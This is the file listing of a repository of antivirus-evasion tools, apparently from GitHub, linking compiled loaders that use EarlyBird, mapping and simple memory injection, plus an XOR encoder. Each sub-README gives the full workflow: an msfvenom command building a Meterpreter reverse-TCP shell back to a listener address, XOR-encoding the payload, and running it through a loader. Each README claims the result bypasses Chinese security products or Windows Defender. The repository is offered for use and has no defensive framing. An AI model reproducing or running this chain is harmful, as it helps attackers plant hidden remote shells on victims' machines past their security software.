├── README.md
├── EarlyBird
│   ├── EarlyBird.exe
│   ├── XorEncode.exe
│   └── README.md
├── MappingInjection
│   ├── XorEncode.exe
│   ├── MappingInjection.exe
│   └── README.md
└── SimpleMemoryInjection
    ├── XorEncode.exe
    ├── ProcessTest.exe
    └── README.md

/README.md:
--------------------------------------------------------------------------------
# Bypass Security software
This repository holds programs I wrote to bypass antivirus software (AV evasion).

Blog: https://reader-l.github.io

--------------------------------------------------------------------------------
/EarlyBird/EarlyBird.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/EarlyBird/EarlyBird.exe

--------------------------------------------------------------------------------
/EarlyBird/XorEncode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/EarlyBird/XorEncode.exe

--------------------------------------------------------------------------------
/MappingInjection/XorEncode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/MappingInjection/XorEncode.exe

--------------------------------------------------------------------------------
/SimpleMemoryInjection/XorEncode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/SimpleMemoryInjection/XorEncode.exe

--------------------------------------------------------------------------------
/MappingInjection/MappingInjection.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/MappingInjection/MappingInjection.exe

--------------------------------------------------------------------------------
/SimpleMemoryInjection/ProcessTest.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/product/BypassSecuritySoftware/main/SimpleMemoryInjection/ProcessTest.exe

--------------------------------------------------------------------------------
/SimpleMemoryInjection/README.md:
--------------------------------------------------------------------------------
This repository holds programs I wrote to bypass antivirus software.
Usage:

1. Generate the complete shellcode with MSF: msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin

2. Then encrypt the generated shellcode file with XorEncode.exe: XorEncode.exe beacon.bin, which produces a file named EncodeRAWData

3. Finally, use ProcessTest.exe to execute the encrypted file EncodeRAWData: ProcessTest.exe EncodeRAWData

Bypass result: can bypass the mainstream security protection software in China

Blog: https://reader-l.github.io

--------------------------------------------------------------------------------
/EarlyBird/README.md:
--------------------------------------------------------------------------------
This repository holds programs I wrote to bypass antivirus software.
Usage:

1. Generate the complete shellcode with MSF: msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin

2. Then encrypt the generated shellcode file with XorEncode.exe: XorEncode.exe beacon.bin, which produces a file named EncodeRAWData

3. Finally, use EarlyBird.exe to execute the encrypted file EncodeRAWData: EarlyBird.exe EncodeRAWData

Bypass result: can bypass the mainstream security protection software in China as well as Windows Defender

Blog: https://reader-l.github.io

--------------------------------------------------------------------------------
/MappingInjection/README.md:
--------------------------------------------------------------------------------
This repository holds programs I wrote to bypass antivirus software.
Usage:

1. Generate the complete shellcode with MSF: msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.43.147 lport=4444 -f raw > beacon.bin

2. Then encrypt the generated shellcode file with XorEncode.exe: XorEncode.exe beacon.bin, which produces a file named EncodeRAWData

3. Finally, use EarlyBird.exe to execute the encrypted file EncodeRAWData: MappingInjection.exe EncodeRAWData

Bypass result: can bypass the mainstream security protection software in China as well as Windows Defender

Blog: https://reader-l.github.io

--------------------------------------------------------------------------------